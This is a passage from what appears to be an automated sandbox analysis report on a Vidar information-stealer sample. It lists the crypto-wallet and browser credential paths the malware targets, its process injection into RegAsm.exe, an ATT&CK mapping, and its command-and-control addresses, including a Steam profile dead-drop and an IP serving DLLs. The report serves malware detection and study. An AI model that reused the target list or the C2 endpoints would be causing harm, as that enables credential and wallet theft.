(Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Opens network shares
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: \\config\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: \\config\Jump to behavior
                  Tries to harvest and steal Bitcoin Wallet information
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                  Tries to steal Crypto Currency Wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4784, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Vidar
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.3a7ac0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.3a7ac0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.380000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 5072, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4784, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		2
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		2
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Native API                  		Boot or Logon Initialization Scripts511
                  Process Injection                  		2
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		1
                  Account Discovery                  		Remote Desktop Protocol4
                  Data from Local System                  		21
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                  DLL Side-Loading                  		Security Account Manager4
                  File and Directory Discovery                  		SMB/Windows Admin Shares1
                  Screen Capture                  		3
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Masquerading                  		NTDS55
                  System Information Discovery                  		Distributed Component Object ModelInput Capture114
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Virtualization/Sandbox Evasion                  		LSA Secrets1
                  Network Share Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts511
                  Process Injection                  		Cached Domain Credentials141
                  Security Software Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem12
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1447265 Sample: file.exe Startdate: 24/05/2024 Architecture: WINDOWS Score: 100 31 steamcommunity.com 2->31 37 Found malware configuration 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 Antivirus / Scanner detection for submitted sample 2->41 43 10 other signatures 2->43 9 file.exe 2->9         started        signatures3 process4 signatures5 45 Contains functionality to inject code into remote processes 9->45 47 Writes to foreign memory regions 9->47 49 Allocates memory in foreign processes 9->49 51 Injects a PE file into a foreign processes 9->51 12 RegAsm.exe 1 46 9->12         started        process6 dnsIp7 33 steamcommunity.com 104.102.42.29, 443, 49710 AKAMAI-ASUS United States 12->33 35 65.109.242.59, 443, 49711, 49712 ALABANZA-BALTUS United States 12->35 23 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 12->23 dropped 25 C:\Users\user\AppData\...\softokn3[1].dll, PE32 12->25 dropped 27 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 12->27 dropped 29 10 other files (none is malicious) 12->29 dropped 53 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->53 55 Found many strings related to Crypto-Wallets (likely being stolen) 12->55 57 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 12->57 59 6 other signatures 12->59 17 cmd.exe 1 12->17         started        file8 signatures9 process10 process11 19 conhost.exe 17->19         started        21 timeout.exe 1 17->21         started       

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  file.exe42%ReversingLabsWin32.Trojan.Zusy
                  file.exe100%AviraHEUR/AGEN.1317026
                  file.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\ProgramData\KECBFBAEBKJJ\freebl3.dll0%ReversingLabs
                  C:\ProgramData\KECBFBAEBKJJ\mozglue.dll0%ReversingLabs
                  C:\ProgramData\KECBFBAEBKJJ\msvcp140.dll0%ReversingLabs
                  C:\ProgramData\KECBFBAEBKJJ\nss3.dll0%ReversingLabs
                  C:\ProgramData\KECBFBAEBKJJ\softokn3.dll0%ReversingLabs
                  C:\ProgramData\KECBFBAEBKJJ\vcruntime140.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqls[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll0%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE0%URL Reputationsafe
                  http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=0%URL Reputationsafe
                  http://www.mozilla.com/en-US/blocklist/0%URL Reputationsafe
                  https://mozilla.org0/0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&0%URL Reputationsafe
                  http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                  https://store.steampowered.com/points/shop/0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK0%URL Reputationsafe
                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                  https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
                  https://store.steampowered.com/about/0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&0%URL Reputationsafe
                  https://help.steampowered.com/en/0%URL Reputationsafe
                  https://store.steampowered.com/news/0%URL Reputationsafe
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                  http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=0%URL Reputationsafe
                  https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg0%URL Reputationsafe
                  https://store.steampowered.com/stats/0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp0%URL Reputationsafe
                  https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v0%URL Reputationsafe
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p0%URL Reputationsafe
                  https://t.me/copterwin0%Avira URL Cloudsafe
                  https://steamcommunity.com/?subsection=broadcasts0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tll0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV0%Avira URL Cloudsafe
                  https://65.109.242.59/mozglue.dllk0%Avira URL Cloudsafe
                  https://steamcommunity.com/profiles/76561199689717899W0%Avira URL Cloudsafe
                  https://65.109.242.59/nss3.dll0%Avira URL Cloudsafe
                  https://store.steampowered.com/legal/0%URL Reputationsafe
                  https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                  http://www.sqlite.org/copyright.html.0%URL Reputationsafe
                  https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=0%URL Reputationsafe
                  https://65.109.242.59/0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli0%URL Reputationsafe
                  https://store.steampowered.com/0%URL Reputationsafe
                  https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_0%URL Reputationsafe
                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
                  https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&l=engli0%URL Reputationsafe
                  http://store.steampowered.com/account/cookiepreferences/0%URL Reputationsafe
                  https://store.steampowered.com/mobile0%URL Reputationsafe
                  https://support.mozilla.org0%URL Reputationsafe
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&0%Avira URL Cloudsafe
                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js0%Avira URL Cloudsafe
                  https://65.109.242.59/softokn3.dll0%Avira URL Cloudsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                  https://steamcommunity.com/m0%Avira URL Cloudsafe
                  https://65.109.242.59/freebl3.dll0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp0%Avira URL Cloudsafe
                  https://65.109.242.59JDGC0%Avira URL Cloudsafe
                  https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta0%Avira URL Cloudsafe
                  https://steamcommunity.com/profiles/765611996897178990%Avira URL Cloudsafe
                  https://65.109.242.59/mozglue.dll0%Avira URL Cloudsafe
                  https://steamcommunity.com/~fRct0%Avira URL Cloudsafe
                  https://steamcommunity.com/market/0%Avira URL Cloudsafe
                  https://65.109.242.59/sqls.dll0%Avira URL Cloudsafe
                  https://65.109.242.59/vcruntime140.dll0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englis0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/heade0%Avira URL Cloudsafe
                  https://steamcommunity.com/my/wishlist/0%Avira URL Cloudsafe
                  https://steamcommunity.com/workshop/0%Avira URL Cloudsafe
                  https://65.109.242.59GIDA0%Avira URL Cloudsafe
                  https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org0%Avira URL Cloudsafe
                  https://steamcommunity.com/profiles/76561199689717899/badges0%Avira URL Cloudsafe
                  https://steamcommunity.com/profiles/76561199689717899/inventory/0%Avira URL Cloudsafe
                  https://65.109.242.590%Avira URL Cloudsafe
                  https://steamcommunity.com/discussions/0%Avira URL Cloudsafe
                  https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.0%Avira URL Cloudsafe
                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOIT0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=1rP88j3WZLBx&amp0%Avira URL Cloudsafe
                  https://steamcommunity.com/0%Avira URL Cloudsafe
                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b30%Avira URL Cloudsafe
                  https://65.109.242.59/msvcp140.dll0%Avira URL Cloudsafe
                  https://steamcommunity.com/login/ho0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  steamcommunity.com
                  		104.102.42.29
                  		truetrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://65.109.242.59/false
                    • Avira URL Cloud: safe
                    		unknown
                    https://65.109.242.59/nss3.dllfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://65.109.242.59/softokn3.dllfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://65.109.242.59/freebl3.dllfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://steamcommunity.com/profiles/76561199689717899true
                    • Avira URL Cloud: safe
                    		unknown
                    https://65.109.242.59/mozglue.dllfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://65.109.242.59/vcruntime140.dllfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://65.109.242.59/sqls.dllfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://65.109.242.59/msvcp140.dllfalse
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabIJECAE.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/ac/?q=IJECAE.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://steamcommunity.com/profiles/76561199689717899WRegAsm.exe, 00000001.00000002.2526755030.0000000001132000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://steamcommunity.com/?subsection=broadcastsRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcVRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tllRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engliRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    		unknown
